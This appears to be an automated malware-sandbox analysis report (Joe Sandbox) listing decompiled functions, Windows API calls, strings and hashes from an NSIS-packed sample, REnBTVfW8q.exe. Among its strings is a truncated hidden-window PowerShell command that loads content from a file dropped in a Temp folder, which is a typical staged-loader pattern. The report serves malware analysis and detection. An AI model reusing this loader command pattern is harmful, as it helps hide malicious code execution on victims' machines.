Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A

Function 00403E6C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
ShowWindow.USER32(?), ref: 00403EC5
DestroyWindow.USER32 ref: 00403ED9
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
GetDlgItem.USER32(?,?), ref: 00403F16
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
IsWindowEnabled.USER32(00000000), ref: 00403F31
GetDlgItem.USER32(?,00000001), ref: 00403FDF
GetDlgItem.USER32(?,00000002), ref: 00403FE9
SetClassLongW.USER32(?,000000F2,?), ref: 00404003
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404054
GetDlgItem.USER32(?,00000003), ref: 004040FA
ShowWindow.USER32(00000000,?), ref: 0040411B
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412D
EnableWindow.USER32(?,?), ref: 00404148
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415E
EnableMenuItem.USER32(00000000), ref: 00404165
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417D
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
SetWindowTextW.USER32(?,00423728), ref: 004041CE
ShowWindow.USER32(?,0000000A), ref: 00404302

Strings

(7B, xrefs: 004041AA

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B
API String ID: 3282139019-3251261122
Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E

Function 00403ABE Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7

GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000), ref: 00403AD8

Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304

lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000), ref: 00403B3F
lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
GetFileAttributesW.KERNEL32(004281E0), ref: 00403BDD
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles), ref: 00403C26
RegisterClassW.USER32(004291E0), ref: 00403C63
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
ShowWindow.USER32(00000005,00000000), ref: 00403CE6
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
RegisterClassW.USER32(004291E0), ref: 00403D28
DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47

Strings

RichEd32, xrefs: 00403CFA
C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles, xrefs: 00403B4E, 00403B56, 00403BF9, 00403BFF, 00403C0F
1033, xrefs: 00403ADE, 00403B3A
Control Panel\Desktop\ResourceLocale, xrefs: 00403AF2
RichEdit, xrefs: 00403D19
RichEd20, xrefs: 00403CEC
.exe, xrefs: 00403BCC
_Nb, xrefs: 00403C42, 00403CAA
(7B, xrefs: 00403AEA
.DEFAULT\Control Panel\International, xrefs: 00403B2A
"C:\Users\user\Desktop\REnBTVfW8q.exe", xrefs: 00403AC2
RichEdit20W, xrefs: 00403D0A, 00403D10
C:\Users\user\AppData\Local\Temp\, xrefs: 00403ACA

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-65220574
Opcode ID: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
Opcode Fuzzy Hash: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D

Function 00402F14 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F28
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F44

Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00402F8D
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4

Strings

Null, xrefs: 0040300D
C:\Users\user\Desktop, xrefs: 00402F6F, 00402F74, 00402F7A
Inst, xrefs: 00402FFB
Error launching installer, xrefs: 00402F64
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040316B
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311D
soft, xrefs: 00403004
"C:\Users\user\Desktop\REnBTVfW8q.exe", xrefs: 00402F14
C:\Users\user\AppData\Local\Temp\, xrefs: 00402F21, 004030EC

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-489658147
Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD

Function 004063D2 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 00406513
GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,?,0040544B,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000), ref: 00406526
SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,?,0040544B,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000), ref: 00406562
SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 00406570
CoTaskMemFree.OLE32(00000000), ref: 0040657B
lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
lstrlenW.KERNEL32(004281E0,00000000,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,?,0040544B,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000), ref: 004065F9

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004064E3
Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond, xrefs: 004063F7
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040659B
"Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin, xrefs: 004065CF

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin$Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-854949449
Opcode ID: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
Opcode Fuzzy Hash: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,%karnis%\Alpeviolerne,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,%karnis%\Alpeviolerne,%karnis%\Alpeviolerne,00000000,00000000,%karnis%\Alpeviolerne,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles,?,?,00000031), ref: 004017D5

Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD

Part of subcall function 00405414: lstrlenW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
Part of subcall function 00405414: lstrcatW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00402EEC,00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000), ref: 0040546F
Part of subcall function 00405414: SetWindowTextW.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond), ref: 00405481
Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

Strings

%karnis%\Alpeviolerne, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Windows\Fonts\appendicits.bun, xrefs: 00401835, 00401851
formagen\Uninstall\frustulose, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: %karnis%\Alpeviolerne$C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles$C:\Windows\Fonts\appendicits.bun$formagen\Uninstall\frustulose
API String ID: 1941528284-1091800651
Opcode ID: 9ebfb073946ae121058b631f201891bc3017374c4b83706ff41abab8acdbf7d0
Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
Opcode Fuzzy Hash: 9ebfb073946ae121058b631f201891bc3017374c4b83706ff41abab8acdbf7d0
Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE

Function 00405414 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
lstrlenW.KERNEL32(00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
lstrcatW.KERNEL32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00402EEC,00402EEC,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,00000000,00000000,00000000), ref: 0040546F
SetWindowTextW.USER32(Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond,Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond), ref: 00405481
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF

Strings

Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond, xrefs: 00405435, 00405445, 0040544B, 0040546E, 0040547A

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Execute: "Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspond
API String ID: 2531174081-3566825971
Opcode ID: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
Instruction ID: b4c9d1203d7b93b364d12d55a96473d81469f1a16e33619bfa53f57c996d0385
Opcode Fuzzy Hash: ae6ed24060c0e1e5203a454600f337dd8354be9e28b06d37a059070ec5477373
Instruction Fuzzy Hash: 0E219071900518BACF119FA5DD85ADFBFB4EF45364F10803AF904B62A0C3794A90CFA8

Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(?), ref: 00401DB6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
ReleaseDC.USER32(?,00000000), ref: 00401DE9
CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38

Strings

Calibri, xrefs: 00401E1E

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: 331e2bd8f52134edb3c64bcd1810fd6956bccb8f00eaf7712ca7db7d847b41c1
Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
Opcode Fuzzy Hash: 331e2bd8f52134edb3c64bcd1810fd6956bccb8f00eaf7712ca7db7d847b41c1
Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D

Function 0040671A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
wsprintfW.USER32 ref: 0040676C
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780

Strings

\, xrefs: 00406742
%s%S.dll, xrefs: 00406766
UXTHEME, xrefs: 00406723

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 212fe184e71725d5a8014c1118872f5233ada1a9ecb6260670121aae60094f83
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: BBF02170510119ABCF10BB64DD0DF9B375CAB00305F50447AA546F20D1EBBCDA78C798

Function 00405ED1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EEF
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\REnBTVfW8q.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036D5), ref: 00405F0A

Strings

"C:\Users\user\Desktop\REnBTVfW8q.exe", xrefs: 00405ED1
nsa, xrefs: 00405EDE
C:\Users\user\AppData\Local\Temp\, xrefs: 00405ED6, 00405EDA

Memory Dump Source

